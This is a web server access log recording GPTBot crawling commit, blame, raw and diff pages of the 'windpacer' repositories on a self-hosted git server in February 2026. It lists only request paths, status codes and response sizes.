git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?files=html%2fassets" [Client 74.7.227.38] [Length 19250] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" +[17/Feb/2026:14:21:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:21:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508485] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom6.png" +[17/Feb/2026:14:21:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:21:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 1851586] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:21:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png" [Client 74.7.227.38] [Length 5699414] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom4.png" +[17/Feb/2026:14:21:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:21:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429965] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom1.png" +[17/Feb/2026:14:21:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 5498858] [Gzip 11.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images/ControlRoom5.png" +[17/Feb/2026:14:21:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 10931] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx-reverse-proxy.conf" +[17/Feb/2026:14:21:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx-reverse-proxy.conf" [Client 74.7.227.38] [Length 620] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx-reverse-proxy.conf" +[17/Feb/2026:14:21:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/keys.json" [Client 74.7.227.38] [Length 9928] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/keys.json" +[17/Feb/2026:14:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10872] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore" +[17/Feb/2026:14:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/types.ts?display=source" [Client 74.7.227.38] [Length 11505] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/types.ts" +[17/Feb/2026:14:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10872] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/types.ts" +[17/Feb/2026:14:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11476] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore" +[17/Feb/2026:14:21:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10879] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/vite.config.ts" +[17/Feb/2026:14:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?display=rendered" [Client 74.7.227.38] [Length 10847] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png" +[17/Feb/2026:14:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png?display=rendered" [Client 74.7.227.38] [Length 10837] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/images/dcsintegration.png" +[17/Feb/2026:14:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=html%2fassets" [Client 74.7.227.38] [Length 52643] [Gzip 8.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets" +[17/Feb/2026:14:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" [Client 74.7.227.38] [Length 10798] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3" +[17/Feb/2026:14:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 17344] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" +[17/Feb/2026:14:21:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 61990] [Gzip 15.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" +[17/Feb/2026:14:22:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 265988] [Gzip 14.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" +[17/Feb/2026:14:22:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 11357] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm" +[17/Feb/2026:14:22:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/docker-compose.yml" [Client 74.7.227.38] [Length 1014] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/docker-compose.yml" +[17/Feb/2026:14:22:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/docker-compose.yml" [Client 74.7.227.38] [Length 1123] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/docker-compose.yml" +[17/Feb/2026:14:22:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/docker-compose.yml" [Client 74.7.227.38] [Length 12615] [Gzip 3.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" +[17/Feb/2026:14:22:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/docker-compose.yml" [Client 74.7.227.38] [Length 12489] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" +[17/Feb/2026:14:22:05 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/%7Bservice.image%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Services.tsx" +[17/Feb/2026:14:22:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/honeywell-logo.svg?display=rendered" [Client 74.7.227.38] [Length 10922] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:14:22:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11895] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup" +[17/Feb/2026:14:22:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 18444] [Gzip 4.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426" +[17/Feb/2026:14:22:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 17111] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" +[17/Feb/2026:14:22:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 18464] [Gzip 4.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426" +[17/Feb/2026:14:22:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 10420] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:22:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 162] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/CMakeLists.txt" +[17/Feb/2026:14:22:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 18466] [Gzip 4.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426" +[17/Feb/2026:14:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 17480] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129" +[17/Feb/2026:14:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 15254] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f?show-outdated=&style=split&whitespace=show-all" +[17/Feb/2026:14:22:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 17481] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129" +[17/Feb/2026:14:22:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 17481] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129" +[17/Feb/2026:14:22:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 9877] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/docker-compose.yml" +[17/Feb/2026:14:22:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 11170] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/docker-compose.yml" +[17/Feb/2026:14:22:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/docker-compose.yml" [Client 74.7.227.38] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/docker-compose.yml" +[17/Feb/2026:14:22:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 17386] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429?show-outdated=&style=unified&whitespace=ignore-eol" +[17/Feb/2026:14:22:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 18847] [Gzip 4.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426?show-outdated=&style=unified&whitespace=ignore-eol" +[17/Feb/2026:14:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 15256] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f?show-outdated=&style=split&whitespace=show-all" +[17/Feb/2026:14:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 17090] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" +[17/Feb/2026:14:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 17661] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129?show-outdated=&style=unified&whitespace=ignore-eol" +[17/Feb/2026:14:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 18469] [Gzip 4.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9374d883a61b35708b6c621337a654b11bcdb426" +[17/Feb/2026:14:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 17661] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129?show-outdated=&style=unified&whitespace=ignore-all" +[17/Feb/2026:14:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 15233] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" +[17/Feb/2026:14:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 17110] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" 